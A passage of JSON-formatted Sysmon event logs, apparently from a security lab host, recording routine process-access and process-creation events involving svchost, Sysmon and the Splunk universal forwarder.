c|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.570\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-00105FE60300}\r\nProcessId: 868\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program 